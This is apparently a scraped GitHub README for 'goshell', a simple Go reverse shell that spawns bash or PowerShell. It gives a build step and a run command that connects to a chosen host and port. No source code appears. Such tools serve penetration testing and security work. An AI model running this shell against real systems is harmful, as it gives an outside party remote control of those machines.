firefart / goshell

Simple golang reverse shell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

GOSHELL

Simple golang based reverse shell. This calls /bin/bash on linux and powershell.exe on windows

Build

make

Run

./goshell-xxx-xx -host IP -port PORT

Notes

This will not provide encryption or any other securiy measures - this is just a simple reverse shell. If you need something more advanced take a look at Chisel

About

Simple golang reverse shell

License:MIT License


Languages

Language:Go 65.1%Language:Makefile 34.9%